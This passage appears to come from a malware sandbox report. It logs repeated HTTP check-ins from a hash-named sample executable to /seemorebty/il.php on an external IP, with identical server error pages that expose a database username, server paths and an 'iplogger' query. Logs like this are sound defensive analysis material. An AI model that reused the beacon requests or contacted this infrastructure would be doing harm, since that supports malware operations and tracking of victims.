30 0d 0a 0d 0a Data Ascii: 38d<br /><b>Deprecated</b>: mysql_pconnect(): The mysql extension is deprecated and will be removed in the future: use mysqli or PDO instead in <b>/www/wwwroot/103.136.42.153/seemorebty/includes/database.php</b> on line <b>47</b><br /><br /><b>Warning</b>: mysql_pconnect(): Access denied for user 'dbnew01'@'localhost' (using password: YES) in <b>/www/wwwroot/103.136.42.153/seemorebty/includes/database.php</b> on line <b>47</b><br /><br /><b>Warning</b>: mysql_query() expects parameter 2 to be resource, boolean given in <b>/www/wwwroot/103.136.42.153/seemorebty/includes/database.php</b> on line <b>73</b><br /><font color="#000000"><b>1045 - Access denied for user 'dbnew01'@'localhost' (using password: YES)<br><br>select iplogger from t_channels where name='38b2c7a1af454d382927f81543d86055886bc02863457' limit 0,1<br><br><small><font color="#ff0000">[TEP STOP]</font></small><br><br></b></font>0
Oct 7, 2022 15:58:40.430598021 CEST	134	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 07 Oct 2022 13:58:41 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 33 38 64 0d 0a 3c 62 72 20 2f 3e 0a 3c 62 3e 44 65 70 72 65 63 61 74 65 64 3c 2f 62 3e 3a 20 20 6d 79 73 71 6c 5f 70 63 6f 6e 6e 65 63 74 28 29 3a 20 54 68 65 20 6d 79 73 71 6c 20 65 78 74 65 6e 73 69 6f 6e 20 69 73 20 64 65 70 72 65 63 61 74 65 64 20 61 6e 64 20 77 69 6c 6c 20 62 65 20 72 65 6d 6f 76 65 64 20 69 6e 20 74 68 65 20 66 75 74 75 72 65 3a 20 75 73 65 20 6d 79 73 71 6c 69 20 6f 72 20 50 44 4f 20 69 6e 73 74 65 61 64 20 69 6e 20 3c 62 3e 2f 77 77 77 2f 77 77 77 72 6f 6f 74 2f 31 30 33 2e 31 33 36 2e 34 32 2e 31 35 33 2f 73 65 65 6d 6f 72 65 62 74 79 2f 69 6e 63 6c 75 64 65 73 2f 64 61 74 61 62 61 73 65 2e 70 68 70 3c 2f 62 3e 20 6f 6e 20 6c 69 6e 65 20 3c 62 3e 34 37 3c 2f 62 3e 3c 62 72 20 2f 3e 0a 3c 62 72 20 2f 3e 0a 3c 62 3e 57 61 72 6e 69 6e 67 3c 2f 62 3e 3a 20 20 6d 79 73 71 6c 5f 70 63 6f 6e 6e 65 63 74 28 29 3a 20 41 63 63 65 73 73 20 64 65 6e 69 65 64 20 66 6f 72 20 75 73 65 72 20 27 64 62 6e 65 77 30 31 27 40 27 6c 6f 63 61 6c 68 6f 73 74 27 20 28 75 73 69 6e 67 20 70 61 73 73 77 6f 72 64 3a 20 59 45 53 29 20 69 6e 20 3c 62 3e 2f 77 77 77 2f 77 77 77 72 6f 6f 74 2f 31 30 33 2e 31 33 36 2e 34 32 2e 31 35 33 2f 73 65 65 6d 6f 72 65 62 74 79 2f 69 6e 63 6c 75 64 65 73 2f 64 61 74 61 62 61 73 65 2e 70 68 70 3c 2f 62 3e 20 6f 6e 20 6c 69 6e 65 20 3c 62 3e 34 37 3c 2f 62 3e 3c 62 72 20 2f 3e 0a 3c 62 72 20 2f 3e 0a 3c 62 3e 57 61 72 6e 69 6e 67 3c 2f 62 3e 3a 20 20 6d 79 73 71 6c 5f 71 75 65 72 79 28 29 20 65 78 70 65 63 74 73 20 70 61 72 61 6d 65 74 65 72 20 32 20 74 6f 20 62 65 20 72 65 73 6f 75 72 63 65 2c 20 62 6f 6f 6c 65 61 6e 20 67 69 76 65 6e 20 69 6e 20 3c 62 3e 2f 77 77 77 2f 77 77 77 72 6f 6f 74 2f 31 30 33 2e 31 33 36 2e 34 32 2e 31 35 33 2f 73 65 65 6d 6f 72 65 62 74 79 2f 69 6e 63 6c 75 64 65 73 2f 64 61 74 61 62 61 73 65 2e 70 68 70 3c 2f 62 3e 20 6f 6e 20 6c 69 6e 65 20 3c 62 3e 37 33 3c 2f 62 3e 3c 62 72 20 2f 3e 0a 3c 66 6f 6e 74 20 63 6f 6c 6f 72 3d 22 23 30 30 30 30 30 30 22 3e 3c 62 3e 31 30 34 35 20 2d 20 41 63 63 65 73 73 20 64 65 6e 69 65 64 20 66 6f 72 20 75 73 65 72 20 27 64 62 6e 65 77 30 31 27 40 27 6c 6f 63 61 6c 68 6f 73 74 27 20 28 75 73 69 6e 67 20 70 61 73 73 77 6f 72 64 3a 20 59 45 53 29 3c 62 72 3e 3c 62 72 3e 73 65 6c 65 63 74 20 69 70 6c 6f 67 67 65 72 20 66 72 6f 6d 20 74 5f 63 68 61 6e 6e 65 6c 73 20 77 68 65 72 65 20 6e 61 6d 65 3d 27 33 38 62 32 63 37 61 31 61 66 34 35 34 64 33 38 32 39 32 37 66 38 31 35 34 33 64 38 36 30 35 35 38 38 36 62 63 30 32 38 36 33 34 35 37 27 20 6c 69 6d 69 74 20 30 2c 31 3c 62 72 3e 3c 62 72 3e 3c 73 6d 61 6c 6c 3e 3c 66 6f 6e 74 20 63 6f 6c 6f 72 3d 22 23 66 66 30 30 30 30 22 3e 5b 54 45 50 20 53 54 4f 50 5d 3c 2f 66 6f 6e 74 3e 3c 2f 73 6d 61 6c 6c 3e 3c 62 72 3e 3c 62 72 3e 3c 2f 62 3e 3c 2f 66 6f 6e 74 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 38d<br /><b>Deprecated</b>: mysql_pconnect(): The mysql extension is deprecated and will be removed in the future: use mysqli or PDO instead in <b>/www/wwwroot/103.136.42.153/seemorebty/includes/database.php</b> on line <b>47</b><br /><br /><b>Warning</b>: mysql_pconnect(): Access denied for user 'dbnew01'@'localhost' (using password: YES) in <b>/www/wwwroot/103.136.42.153/seemorebty/includes/database.php</b> on line <b>47</b><br /><br /><b>Warning</b>: mysql_query() expects parameter 2 to be resource, boolean given in <b>/www/wwwroot/103.136.42.153/seemorebty/includes/database.php</b> on line <b>73</b><br /><font color="#000000"><b>1045 - Access denied for user 'dbnew01'@'localhost' (using password: YES)<br><br>select iplogger from t_channels where name='38b2c7a1af454d382927f81543d86055886bc02863457' limit 0,1<br><br><small><font color="#ff0000">[TEP STOP]</font></small><br><br></b></font>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
12	192.168.2.5	49704	103.136.42.153	80	C:\Users\user\Desktop\38b2c7a1af454d382927f81543d86055886bc02863457.exe

Timestamp	kBytes transferred	Direction	Data
Oct 7, 2022 15:58:45.640348911 CEST	284	OUT	GET /seemorebty/il.php?e=38b2c7a1af454d382927f81543d86055886bc02863457 HTTP/1.1 Connection: Keep-Alive Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image webp,image apng, q=0.8,application signed-exchange v=b3 Accept-Language: en-US,en;q=0.9 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit 537.36 (KHTML, like Gecko) Chrome 70.0.3538.110 Safari 537.36 Host: 103.136.42.153
Oct 7, 2022 15:58:45.668318987 CEST	285	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 07 Oct 2022 13:58:47 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 33 38 64 0d 0a 3c 62 72 20 2f 3e 0a 3c 62 3e 44 65 70 72 65 63 61 74 65 64 3c 2f 62 3e 3a 20 20 6d 79 73 71 6c 5f 70 63 6f 6e 6e 65 63 74 28 29 3a 20 54 68 65 20 6d 79 73 71 6c 20 65 78 74 65 6e 73 69 6f 6e 20 69 73 20 64 65 70 72 65 63 61 74 65 64 20 61 6e 64 20 77 69 6c 6c 20 62 65 20 72 65 6d 6f 76 65 64 20 69 6e 20 74 68 65 20 66 75 74 75 72 65 3a 20 75 73 65 20 6d 79 73 71 6c 69 20 6f 72 20 50 44 4f 20 69 6e 73 74 65 61 64 20 69 6e 20 3c 62 3e 2f 77 77 77 2f 77 77 77 72 6f 6f 74 2f 31 30 33 2e 31 33 36 2e 34 32 2e 31 35 33 2f 73 65 65 6d 6f 72 65 62 74 79 2f 69 6e 63 6c 75 64 65 73 2f 64 61 74 61 62 61 73 65 2e 70 68 70 3c 2f 62 3e 20 6f 6e 20 6c 69 6e 65 20 3c 62 3e 34 37 3c 2f 62 3e 3c 62 72 20 2f 3e 0a 3c 62 72 20 2f 3e 0a 3c 62 3e 57 61 72 6e 69 6e 67 3c 2f 62 3e 3a 20 20 6d 79 73 71 6c 5f 70 63 6f 6e 6e 65 63 74 28 29 3a 20 41 63 63 65 73 73 20 64 65 6e 69 65 64 20 66 6f 72 20 75 73 65 72 20 27 64 62 6e 65 77 30 31 27 40 27 6c 6f 63 61 6c 68 6f 73 74 27 20 28 75 73 69 6e 67 20 70 61 73 73 77 6f 72 64 3a 20 59 45 53 29 20 69 6e 20 3c 62 3e 2f 77 77 77 2f 77 77 77 72 6f 6f 74 2f 31 30 33 2e 31 33 36 2e 34 32 2e 31 35 33 2f 73 65 65 6d 6f 72 65 62 74 79 2f 69 6e 63 6c 75 64 65 73 2f 64 61 74 61 62 61 73 65 2e 70 68 70 3c 2f 62 3e 20 6f 6e 20 6c 69 6e 65 20 3c 62 3e 34 37 3c 2f 62 3e 3c 62 72 20 2f 3e 0a 3c 62 72 20 2f 3e 0a 3c 62 3e 57 61 72 6e 69 6e 67 3c 2f 62 3e 3a 20 20 6d 79 73 71 6c 5f 71 75 65 72 79 28 29 20 65 78 70 65 63 74 73 20 70 61 72 61 6d 65 74 65 72 20 32 20 74 6f 20 62 65 20 72 65 73 6f 75 72 63 65 2c 20 62 6f 6f 6c 65 61 6e 20 67 69 76 65 6e 20 69 6e 20 3c 62 3e 2f 77 77 77 2f 77 77 77 72 6f 6f 74 2f 31 30 33 2e 31 33 36 2e 34 32 2e 31 35 33 2f 73 65 65 6d 6f 72 65 62 74 79 2f 69 6e 63 6c 75 64 65 73 2f 64 61 74 61 62 61 73 65 2e 70 68 70 3c 2f 62 3e 20 6f 6e 20 6c 69 6e 65 20 3c 62 3e 37 33 3c 2f 62 3e 3c 62 72 20 2f 3e 0a 3c 66 6f 6e 74 20 63 6f 6c 6f 72 3d 22 23 30 30 30 30 30 30 22 3e 3c 62 3e 31 30 34 35 20 2d 20 41 63 63 65 73 73 20 64 65 6e 69 65 64 20 66 6f 72 20 75 73 65 72 20 27 64 62 6e 65 77 30 31 27 40 27 6c 6f 63 61 6c 68 6f 73 74 27 20 28 75 73 69 6e 67 20 70 61 73 73 77 6f 72 64 3a 20 59 45 53 29 3c 62 72 3e 3c 62 72 3e 73 65 6c 65 63 74 20 69 70 6c 6f 67 67 65 72 20 66 72 6f 6d 20 74 5f 63 68 61 6e 6e 65 6c 73 20 77 68 65 72 65 20 6e 61 6d 65 3d 27 33 38 62 32 63 37 61 31 61 66 34 35 34 64 33 38 32 39 32 37 66 38 31 35 34 33 64 38 36 30 35 35 38 38 36 62 63 30 32 38 36 33 34 35 37 27 20 6c 69 6d 69 74 20 30 2c 31 3c 62 72 3e 3c 62 72 3e 3c 73 6d 61 6c 6c 3e 3c 66 6f 6e 74 20 63 6f 6c 6f 72 3d 22 23 66 66 30 30 30 30 22 3e 5b 54 45 50 20 53 54 4f 50 5d 3c 2f 66 6f 6e 74 3e 3c 2f 73 6d 61 6c 6c 3e 3c 62 72 3e 3c 62 72 3e 3c 2f 62 3e 3c 2f 66 6f 6e 74 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 38d<br /><b>Deprecated</b>: mysql_pconnect(): The mysql extension is deprecated and will be removed in the future: use mysqli or PDO instead in <b>/www/wwwroot/103.136.42.153/seemorebty/includes/database.php</b> on line <b>47</b><br /><br /><b>Warning</b>: mysql_pconnect(): Access denied for user 'dbnew01'@'localhost' (using password: YES) in <b>/www/wwwroot/103.136.42.153/seemorebty/includes/database.php</b> on line <b>47</b><br /><br /><b>Warning</b>: mysql_query() expects parameter 2 to be resource, boolean given in <b>/www/wwwroot/103.136.42.153/seemorebty/includes/database.php</b> on line <b>73</b><br /><font color="#000000"><b>1045 - Access denied for user 'dbnew01'@'localhost' (using password: YES)<br><br>select iplogger from t_channels where name='38b2c7a1af454d382927f81543d86055886bc02863457' limit 0,1<br><br><small><font color="#ff0000">[TEP STOP]</font></small><br><br></b></font>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
13	192.168.2.5	49706	103.136.42.153	80	C:\Users\user\Desktop\38b2c7a1af454d382927f81543d86055886bc02863457.exe

Timestamp	kBytes transferred	Direction	Data
Oct 7, 2022 15:58:59.897074938 CEST	447	OUT	GET /seemorebty/il.php?e=38b2c7a1af454d382927f81543d86055886bc02863457 HTTP/1.1 Connection: Keep-Alive Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image webp,image apng, q=0.8,application signed-exchange v=b3 Accept-Language: en-US,en;q=0.9 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit 537.36 (KHTML, like Gecko) Chrome 70.0.3538.110 Safari 537.36 Host: 103.136.42.153
Oct 7, 2022 15:58:59.923868895 CEST	449	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 07 Oct 2022 13:59:01 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 33 38 64 0d 0a 3c 62 72 20 2f 3e 0a 3c 62 3e 44 65 70 72 65 63 61 74 65 64 3c 2f 62 3e 3a 20 20 6d 79 73 71 6c 5f 70 63 6f 6e 6e 65 63 74 28 29 3a 20 54 68 65 20 6d 79 73 71 6c 20 65 78 74 65 6e 73 69 6f 6e 20 69 73 20 64 65 70 72 65 63 61 74 65 64 20 61 6e 64 20 77 69 6c 6c 20 62 65 20 72 65 6d 6f 76 65 64 20 69 6e 20 74 68 65 20 66 75 74 75 72 65 3a 20 75 73 65 20 6d 79 73 71 6c 69 20 6f 72 20 50 44 4f 20 69 6e 73 74 65 61 64 20 69 6e 20 3c 62 3e 2f 77 77 77 2f 77 77 77 72 6f 6f 74 2f 31 30 33 2e 31 33 36 2e 34 32 2e 31 35 33 2f 73 65 65 6d 6f 72 65 62 74 79 2f 69 6e 63 6c 75 64 65 73 2f 64 61 74 61 62 61 73 65 2e 70 68 70 3c 2f 62 3e 20 6f 6e 20 6c 69 6e 65 20 3c 62 3e 34 37 3c 2f 62 3e 3c 62 72 20 2f 3e 0a 3c 62 72 20 2f 3e 0a 3c 62 3e 57 61 72 6e 69 6e 67 3c 2f 62 3e 3a 20 20 6d 79 73 71 6c 5f 70 63 6f 6e 6e 65 63 74 28 29 3a 20 41 63 63 65 73 73 20 64 65 6e 69 65 64 20 66 6f 72 20 75 73 65 72 20 27 64 62 6e 65 77 30 31 27 40 27 6c 6f 63 61 6c 68 6f 73 74 27 20 28 75 73 69 6e 67 20 70 61 73 73 77 6f 72 64 3a 20 59 45 53 29 20 69 6e 20 3c 62 3e 2f 77 77 77 2f 77 77 77 72 6f 6f 74 2f 31 30 33 2e 31 33 36 2e 34 32 2e 31 35 33 2f 73 65 65 6d 6f 72 65 62 74 79 2f 69 6e 63 6c 75 64 65 73 2f 64 61 74 61 62 61 73 65 2e 70 68 70 3c 2f 62 3e 20 6f 6e 20 6c 69 6e 65 20 3c 62 3e 34 37 3c 2f 62 3e 3c 62 72 20 2f 3e 0a 3c 62 72 20 2f 3e 0a 3c 62 3e 57 61 72 6e 69 6e 67 3c 2f 62 3e 3a 20 20 6d 79 73 71 6c 5f 71 75 65 72 79 28 29 20 65 78 70 65 63 74 73 20 70 61 72 61 6d 65 74 65 72 20 32 20 74 6f 20 62 65 20 72 65 73 6f 75 72 63 65 2c 20 62 6f 6f 6c 65 61 6e 20 67 69 76 65 6e 20 69 6e 20 3c 62 3e 2f 77 77 77 2f 77 77 77 72 6f 6f 74 2f 31 30 33 2e 31 33 36 2e 34 32 2e 31 35 33 2f 73 65 65 6d 6f 72 65 62 74 79 2f 69 6e 63 6c 75 64 65 73 2f 64 61 74 61 62 61 73 65 2e 70 68 70 3c 2f 62 3e 20 6f 6e 20 6c 69 6e 65 20 3c 62 3e 37 33 3c 2f 62 3e 3c 62 72 20 2f 3e 0a 3c 66 6f 6e 74 20 63 6f 6c 6f 72 3d 22 23 30 30 30 30 30 30 22 3e 3c 62 3e 31 30 34 35 20 2d 20 41 63 63 65 73 73 20 64 65 6e 69 65 64 20 66 6f 72 20 75 73 65 72 20 27 64 62 6e 65 77 30 31 27 40 27 6c 6f 63 61 6c 68 6f 73 74 27 20 28 75 73 69 6e 67 20 70 61 73 73 77 6f 72 64 3a 20 59 45 53 29 3c 62 72 3e 3c 62 72 3e 73 65 6c 65 63 74 20 69 70 6c 6f 67 67 65 72 20 66 72 6f 6d 20 74 5f 63 68 61 6e 6e 65 6c 73 20 77 68 65 72 65 20 6e 61 6d 65 3d 27 33 38 62 32 63 37 61 31 61 66 34 35 34 64 33 38 32 39 32 37 66 38 31 35 34 33 64 38 36 30 35 35 38 38 36 62 63 30 32 38 36 33 34 35 37 27 20 6c 69 6d 69 74 20 30 2c 31 3c 62 72 3e 3c 62 72 3e 3c 73 6d 61 6c 6c 3e 3c 66 6f 6e 74 20 63 6f 6c 6f 72 3d 22 23 66 66 30 30 30 30 22 3e 5b 54 45 50 20 53 54 4f 50 5d 3c 2f 66 6f 6e 74 3e 3c 2f 73 6d 61 6c 6c 3e 3c 62 72 3e 3c 62 72 3e 3c 2f 62 3e 3c 2f 66 6f 6e 74 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 38d<br /><b>Deprecated</b>: mysql_pconnect(): The mysql extension is deprecated and will be removed in the future: use mysqli or PDO instead in <b>/www/wwwroot/103.136.42.153/seemorebty/includes/database.php</b> on line <b>47</b><br /><br /><b>Warning</b>: mysql_pconnect(): Access denied for user 'dbnew01'@'localhost' (using password: YES) in <b>/www/wwwroot/103.136.42.153/seemorebty/includes/database.php</b> on line <b>47</b><br /><br /><b>Warning</b>: mysql_query() expects parameter 2 to be resource, boolean given in <b>/www/wwwroot/103.136.42.153/seemorebty/includes/database.php</b> on line <b>73</b><br /><font color="#000000"><b>1045 - Access denied for user 'dbnew01'@'localhost' (using password: YES)<br><br>select iplogger from t_channels where name='38b2c7a1af454d382927f81543d86055886bc02863457' limit 0,1<br><br><small><font color="#ff0000">[TEP STOP]</font></small><br><br></b></font>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
14	192.168.2.5	49709	103.136.42.153	80	C:\Users\user\Desktop\38b2c7a1af454d382927f81543d86055886bc02863457.exe

Timestamp	kBytes transferred	Direction	Data
Oct 7, 2022 15:59:17.845443964 CEST	611	OUT	GET /seemorebty/il.php?e=38b2c7a1af454d382927f81543d86055886bc02863457 HTTP/1.1 Connection: Keep-Alive Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image webp,image apng, q=0.8,application signed-exchange v=b3 Accept-Language: en-US,en;q=0.9 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit 537.36 (KHTML, like Gecko) Chrome 70.0.3538.110 Safari 537.36 Host: 103.136.42.153
Oct 7, 2022 15:59:17.872682095 CEST	612	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 07 Oct 2022 13:59:19 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 33 38 64 0d 0a 3c 62 72 20 2f 3e 0a 3c 62 3e 44 65 70 72 65 63 61 74 65 64 3c 2f 62 3e 3a 20 20 6d 79 73 71 6c 5f 70 63 6f 6e 6e 65 63 74 28 29 3a 20 54 68 65 20 6d 79 73 71 6c 20 65 78 74 65 6e 73 69 6f 6e 20 69 73 20 64 65 70 72 65 63 61 74 65 64 20 61 6e 64 20 77 69 6c 6c 20 62 65 20 72 65 6d 6f 76 65 64 20 69 6e 20 74 68 65 20 66 75 74 75 72 65 3a 20 75 73 65 20 6d 79 73 71 6c 69 20 6f 72 20 50 44 4f 20 69 6e 73 74 65 61 64 20 69 6e 20 3c 62 3e 2f 77 77 77 2f 77 77 77 72 6f 6f 74 2f 31 30 33 2e 31 33 36 2e 34 32 2e 31 35 33 2f 73 65 65 6d 6f 72 65 62 74 79 2f 69 6e 63 6c 75 64 65 73 2f 64 61 74 61 62 61 73 65 2e 70 68 70 3c 2f 62 3e 20 6f 6e 20 6c 69 6e 65 20 3c 62 3e 34 37 3c 2f 62 3e 3c 62 72 20 2f 3e 0a 3c 62 72 20 2f 3e 0a 3c 62 3e 57 61 72 6e 69 6e 67 3c 2f 62 3e 3a 20 20 6d 79 73 71 6c 5f 70 63 6f 6e 6e 65 63 74 28 29 3a 20 41 63 63 65 73 73 20 64 65 6e 69 65 64 20 66 6f 72 20 75 73 65 72 20 27 64 62 6e 65 77 30 31 27 40 27 6c 6f 63 61 6c 68 6f 73 74 27 20 28 75 73 69 6e 67 20 70 61 73 73 77 6f 72 64 3a 20 59 45 53 29 20 69 6e 20 3c 62 3e 2f 77 77 77 2f 77 77 77 72 6f 6f 74 2f 31 30 33 2e 31 33 36 2e 34 32 2e 31 35 33 2f 73 65 65 6d 6f 72 65 62 74 79 2f 69 6e 63 6c 75 64 65 73 2f 64 61 74 61 62 61 73 65 2e 70 68 70 3c 2f 62 3e 20 6f 6e 20 6c 69 6e 65 20 3c 62 3e 34 37 3c 2f 62 3e 3c 62 72 20 2f 3e 0a 3c 62 72 20 2f 3e 0a 3c 62 3e 57 61 72 6e 69 6e 67 3c 2f 62 3e 3a 20 20 6d 79 73 71 6c 5f 71 75 65 72 79 28 29 20 65 78 70 65 63 74 73 20 70 61 72 61 6d 65 74 65 72 20 32 20 74 6f 20 62 65 20 72 65 73 6f 75 72 63 65 2c 20 62 6f 6f 6c 65 61 6e 20 67 69 76 65 6e 20 69 6e 20 3c 62 3e 2f 77 77 77 2f 77 77 77 72 6f 6f 74 2f 31 30 33 2e 31 33 36 2e 34 32 2e 31 35 33 2f 73 65 65 6d 6f 72 65 62 74 79 2f 69 6e 63 6c 75 64 65 73 2f 64 61 74 61 62 61 73 65 2e 70 68 70 3c 2f 62 3e 20 6f 6e 20 6c 69 6e 65 20 3c 62 3e 37 33 3c 2f 62 3e 3c 62 72 20 2f 3e 0a 3c 66 6f 6e 74 20 63 6f 6c 6f 72 3d 22 23 30 30 30 30 30 30 22 3e 3c 62 3e 31 30 34 35 20 2d 20 41 63 63 65 73 73 20 64 65 6e 69 65 64 20 66 6f 72 20 75 73 65 72 20 27 64 62 6e 65 77 30 31 27 40 27 6c 6f 63 61 6c 68 6f 73 74 27 20 28 75 73 69 6e 67 20 70 61 73 73 77 6f 72 64 3a 20 59 45 53 29 3c 62 72 3e 3c 62 72 3e 73 65 6c 65 63 74 20 69 70 6c 6f 67 67 65 72 20 66 72 6f 6d 20 74 5f 63 68 61 6e 6e 65 6c 73 20 77 68 65 72 65 20 6e 61 6d 65 3d 27 33 38 62 32 63 37 61 31 61 66 34 35 34 64 33 38 32 39 32 37 66 38 31 35 34 33 64 38 36 30 35 35 38 38 36 62 63 30 32 38 36 33 34 35 37 27 20 6c 69 6d 69 74 20 30 2c 31 3c 62 72 3e 3c 62 72 3e 3c 73 6d 61 6c 6c 3e 3c 66 6f 6e 74 20 63 6f 6c 6f 72 3d 22 23 66 66 30 30 30 30 22 3e 5b 54 45 50 20 53 54 4f 50 5d 3c 2f 66 6f 6e 74 3e 3c 2f 73 6d 61 6c 6c 3e 3c 62 72 3e 3c 62 72 3e 3c 2f 62 3e 3c 2f 66 6f 6e 74 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 38d<br /><b>Deprecated</b>: mysql_pconnect(): The mysql extension is deprecated and will be removed in the future: use mysqli or PDO instead in <b>/www/wwwroot/103.136.42.153/seemorebty/includes/database.php</b> on line <b>47</b><br /><br /><b>Warning</b>: mysql_pconnect(): Access denied for user 'dbnew01'@'localhost' (using password: YES) in <b>/www/wwwroot/103.136.42.153/seemorebty/includes/database.php</b> on line <b>47</b><br /><br /><b>Warning</b>: mysql_query() expects parameter 2 to be resource, boolean given in <b>/www/wwwroot/103.136.42.153/seemorebty/includes/database.php</b> on line <b>73</b><br /><font color="#000000"><b>1045 - Access denied for user 'dbnew01'@'localhost' (using password: YES)<br><br>select iplogger from t_channels where name='38b2c7a1af454d382927f81543d86055886bc02863457' limit 0,1<br><br><small><font color="#ff0000">[TEP STOP]</font></small><br><br></b></font>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
15	192.168.2.5	49711	103.136.42.153	80	C:\Users\user\Desktop\38b2c7a1af454d382927f81543d86055886bc02863457.exe

Timestamp	kBytes transferred	Direction	Data
Oct 7, 2022 15:59:24.383379936 CEST	775	OUT	GET /seemorebty/il.php?e=38b2c7a1af454d382927f81543d86055886bc02863457 HTTP/1.1 Connection: Keep-Alive Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image webp,image apng, q=0.8,application signed-exchange v=b3 Accept-Language: en-US,en;q=0.9 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit 537.36 (KHTML, like Gecko) Chrome 70.0.3538.110 Safari 537.36 Host: 103.136.42.153
Oct 7, 2022 15:59:24.414273977 CEST	776	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 07 Oct 2022 13:59:25 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 33 38 64 0d 0a 3c 62 72 20 2f 3e 0a 3c 62 3e 44 65 70 72 65 63 61 74 65 64 3c 2f 62 3e 3a 20 20 6d 79 73 71 6c 5f 70 63 6f 6e 6e 65 63 74 28 29 3a 20 54 68 65 20 6d 79 73 71 6c 20 65 78 74 65 6e 73 69 6f 6e 20 69 73 20 64 65 70 72 65 63 61 74 65 64 20 61 6e 64 20 77 69 6c 6c 20 62 65 20 72 65 6d 6f 76 65 64 20 69 6e 20 74 68 65 20 66 75 74 75 72 65 3a 20 75 73 65 20 6d 79 73 71 6c 69 20 6f 72 20 50 44 4f 20 69 6e 73 74 65 61 64 20 69 6e 20 3c 62 3e 2f 77 77 77 2f 77 77 77 72 6f 6f 74 2f 31 30 33 2e 31 33 36 2e 34 32 2e 31 35 33 2f 73 65 65 6d 6f 72 65 62 74 79 2f 69 6e 63 6c 75 64 65 73 2f 64 61 74 61 62 61 73 65 2e 70 68 70 3c 2f 62 3e 20 6f 6e 20 6c 69 6e 65 20 3c 62 3e 34 37 3c 2f 62 3e 3c 62 72 20 2f 3e 0a 3c 62 72 20 2f 3e 0a 3c 62 3e 57 61 72 6e 69 6e 67 3c 2f 62 3e 3a 20 20 6d 79 73 71 6c 5f 70 63 6f 6e 6e 65 63 74 28 29 3a 20 41 63 63 65 73 73 20 64 65 6e 69 65 64 20 66 6f 72 20 75 73 65 72 20 27 64 62 6e 65 77 30 31 27 40 27 6c 6f 63 61 6c 68 6f 73 74 27 20 28 75 73 69 6e 67 20 70 61 73 73 77 6f 72 64 3a 20 59 45 53 29 20 69 6e 20 3c 62 3e 2f 77 77 77 2f 77 77 77 72 6f 6f 74 2f 31 30 33 2e 31 33 36 2e 34 32 2e 31 35 33 2f 73 65 65 6d 6f 72 65 62 74 79 2f 69 6e 63 6c 75 64 65 73 2f 64 61 74 61 62 61 73 65 2e 70 68 70 3c 2f 62 3e 20 6f 6e 20 6c 69 6e 65 20 3c 62 3e 34 37 3c 2f 62 3e 3c 62 72 20 2f 3e 0a 3c 62 72 20 2f 3e 0a 3c 62 3e 57 61 72 6e 69 6e 67 3c 2f 62 3e 3a 20 20 6d 79 73 71 6c 5f 71 75 65 72 79 28 29 20 65 78 70 65 63 74 73 20 70 61 72 61 6d 65 74 65 72 20 32 20 74 6f 20 62 65 20 72 65 73 6f 75 72 63 65 2c 20 62 6f 6f 6c 65 61 6e 20 67 69 76 65 6e 20 69 6e 20 3c 62 3e 2f 77 77 77 2f 77 77 77 72 6f 6f 74 2f 31 30 33 2e 31 33 36 2e 34 32 2e 31 35 33 2f 73 65 65 6d 6f 72 65 62 74 79 2f 69 6e 63 6c 75 64 65 73 2f 64 61 74 61 62 61 73 65 2e 70 68 70 3c 2f 62 3e 20 6f 6e 20 6c 69 6e 65 20 3c 62 3e 37 33 3c 2f 62 3e 3c 62 72 20 2f 3e 0a 3c 66 6f 6e 74 20 63 6f 6c 6f 72 3d 22 23 30 30 30 30 30 30 22 3e 3c 62 3e 31 30 34 35 20 2d 20 41 63 63 65 73 73 20 64 65 6e 69 65 64 20 66 6f 72 20 75 73 65 72 20 27 64 62 6e 65 77 30 31 27 40 27 6c 6f 63 61 6c 68 6f 73 74 27 20 28 75 73 69 6e 67 20 70 61 73 73 77 6f 72 64 3a 20 59 45 53 29 3c 62 72 3e 3c 62 72 3e 73 65 6c 65 63 74 20 69 70 6c 6f 67 67 65 72 20 66 72 6f 6d 20 74 5f 63 68 61 6e 6e 65 6c 73 20 77 68 65 72 65 20 6e 61 6d 65 3d 27 33 38 62 32 63 37 61 31 61 66 34 35 34 64 33 38 32 39 32 37 66 38 31 35 34 33 64 38 36 30 35 35 38 38 36 62 63 30 32 38 36 33 34 35 37 27 20 6c 69 6d 69 74 20 30 2c 31 3c 62 72 3e 3c 62 72 3e 3c 73 6d 61 6c 6c 3e 3c 66 6f 6e 74 20 63 6f 6c 6f 72 3d 22 23 66 66 30 30 30 30 22 3e 5b 54 45 50 20 53 54 4f 50 5d 3c 2f 66 6f 6e 74 3e 3c 2f 73 6d 61 6c 6c 3e 3c 62 72 3e 3c 62 72 3e 3c 2f 62 3e 3c 2f 66 6f 6e 74 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 38d<br /><b>Deprecated</b>: mysql_pconnect(): The mysql extension is deprecated and will be removed in the future: use mysqli or PDO instead in 